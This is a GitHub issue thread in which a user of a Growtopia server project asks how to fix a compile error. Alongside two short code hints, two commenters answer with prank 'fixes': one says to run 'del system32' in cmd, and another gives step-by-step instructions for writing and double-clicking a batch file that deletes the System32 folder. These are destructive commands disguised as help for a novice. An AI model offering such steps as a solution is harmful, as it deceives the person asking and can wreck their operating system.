### ISSUE TITLE
How can I fix this error

### ISSUE THREAD

**Issue by MainCmd** [GrowtopiaNoobs/GrowtopiaServer#1129]
How can I fix this error
![hwc](https://user-images.githubusercontent.com/55925889/72255289-68493f80-3617-11ea-9506-6d33556ecacb.PNG)

**Comment by Zlarex** [comment]
Use ```#define```

**Comment by kingawesomed2** [comment]
Open cmd type del system32

**Comment by LaYellow** [comment]
Step 1. Open Notepad.

Step 2. Type  cd “C:\Windows\  in Notepad.

Step 3. Hit Enter and move one line down in Notepad and type del.

Step 4. Now type the file name after del with one space.

Step 5. Type the file name along with any extensions if present with quotes. Example:del “System32”.

Step 6. Save the file as Save as type “All Files”.

Step 7. Save file name with .bat extension. Example: sample.bat

Step 8. Save the file, locate the file and double-click the batch file to delete the System32 files.

**Comment by cmdocmd** [comment]
.....

**Comment by WoofHax** [comment]
#include <experimental/filesystem>

**Comment by GrowtopiaNoobs** [comment]
This issue was answered, so I am closing this.
